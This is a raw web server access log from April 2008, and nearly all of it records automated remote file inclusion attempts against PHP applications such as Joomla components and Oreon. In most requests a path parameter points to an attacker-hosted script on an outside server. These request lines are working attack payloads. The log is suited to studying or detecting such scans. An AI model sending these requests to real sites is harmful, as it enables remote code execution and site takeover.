211.220.195.20 - - [01/Apr/2008:05:00:07 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:00:08 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:00:08 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:00:13 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:00:13 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:00:13 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:00:21 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:00:22 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:00:22 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:00:23 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:00:23 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:00:24 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:00:31 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:00:31 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:00:32 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:00:39 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:00:39 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:00:40 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:00:45 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:00:45 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:00:46 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:00:49 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:00:49 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:00:50 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:05:00:57 -0700] "GET /logs/?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 200 41264 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:05:00:57 -0700] "GET /?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 200 3362 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:05:00:58 -0700] "GET /logs/access_080228.log/%02/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://contactcraze.com/t.txt????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:05:00:58 -0700] "GET /%02/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://contactcraze.com/t.txt????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:05:00:58 -0700] "GET /logs/%02/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://contactcraze.com/t.txt????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.152.130 - - [01/Apr/2008:05:01:08 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://laghaimers.com/list?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:01:24 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:01:24 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:01:24 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.100.12.226 - - [01/Apr/2008:05:01:55 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.100.12.226 - - [01/Apr/2008:05:01:56 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.100.12.226 - - [01/Apr/2008:05:01:56 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:01:59 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:02:04 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.31.158 - - [01/Apr/2008:05:02:06 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.31.158 - - [01/Apr/2008:05:02:07 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.31.158 - - [01/Apr/2008:05:02:07 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.84.20.85 - - [01/Apr/2008:05:02:33 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.11.51.137 - - [01/Apr/2008:05:02:35 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:02:35 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.2.130 - - [01/Apr/2008:05:02:43 -0700] "GET /index.php?option=com_forum&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:02:48 -0700] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:02:51 -0700] "GET /logs/access_080119.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.31.158 - - [01/Apr/2008:05:02:54 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.249.108 - - [01/Apr/2008:05:03:03 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://mildnet.by.ru/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:03:07 -0700] "GET /logs/access_080119.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.11.51.137 - - [01/Apr/2008:05:03:14 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.51.137 - - [01/Apr/2008:05:03:14 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.51.137 - - [01/Apr/2008:05:03:14 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:03:17 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.redladys.net/tgp/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:03:18 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.redladys.net/tgp/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:03:18 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.redladys.net/tgp/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:03:26 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.7.108.242 - - [01/Apr/2008:05:03:33 -0700] "GET //phplivehelper/initiate.php?abs_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:03:51 -0700] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:03:54 -0700] "GET /logs/access_080119.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.84.20.85 - - [01/Apr/2008:05:03:55 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.84.20.85 - - [01/Apr/2008:05:03:55 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.84.20.85 - - [01/Apr/2008:05:03:55 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.11.51.137 - - [01/Apr/2008:05:04:09 -0700] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.84.20.85 - - [01/Apr/2008:05:04:12 -0700] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.11.51.137 - - [01/Apr/2008:05:04:25 -0700] "GET /logs/access_080119.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.84.20.85 - - [01/Apr/2008:05:04:25 -0700] "GET /logs/access_080119.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.31.158 - - [01/Apr/2008:05:04:51 -0700] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:04:52 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:04:53 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:04:53 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.31.158 - - [01/Apr/2008:05:05:04 -0700] "GET /logs/access_080119.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:05:05 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:05:06 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:05:06 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:05:12 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:05:31 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:05:39 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.36.33 - - [01/Apr/2008:05:06:04 -0700] "GET /logs/access_080124.log//portfolio/msg/view.php?av=http://www.silak.eu//components/com_rwcard/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [01/Apr/2008:05:06:04 -0700] "GET /logs//portfolio/msg/view.php?av=http://www.silak.eu//components/com_rwcard/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [01/Apr/2008:05:06:17 -0700] "GET /logs/access_080124.log//portfolio/msg/view.php?av=http://www.silak.eu//components/com_rwcard/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [01/Apr/2008:05:06:17 -0700] "GET /logs//portfolio/msg/view.php?av=http://www.silak.eu//components/com_rwcard/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.120 - - [01/Apr/2008:05:06:30 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.163 - - [01/Apr/2008:05:06:31 -0700] "GET /logs/access_071223.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.108.66.169 - - [01/Apr/2008:05:06:46 -0700] "GET //ask_password.php?dir=http://www.geocities.com/vie.tian/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.36.33 - - [01/Apr/2008:05:06:51 -0700] "GET /logs/access_080128.log//portfolio/msg/view.php?av=http://www.silak.eu//components/com_rwcard/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [01/Apr/2008:05:06:55 -0700] "GET /logs/access_080128.log//portfolio/msg/view.php?av=http://www.silak.eu//components/com_rwcard/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:07:43 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:07:43 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:07:43 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:07:46 -0700] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:07:50 -0700] "GET /logs/access_080119.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:05:07:54 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:05:07:58 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:08:01 -0700] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:08:06 -0700] "GET /logs/access_080119.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.19.130 - - [01/Apr/2008:05:08:27 -0700] "GET /logs/access_080228.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.19.130 - - [01/Apr/2008:05:08:28 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.19.130 - - [01/Apr/2008:05:08:28 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:08:30 -0700] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:08:33 -0700] "GET /logs/access_080119.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.107.122 - - [01/Apr/2008:05:08:35 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [01/Apr/2008:05:08:35 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [01/Apr/2008:05:08:35 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:05:08:38 -0700] "GET /logs/access.log/%02/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://contactcraze.com/t.txt????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
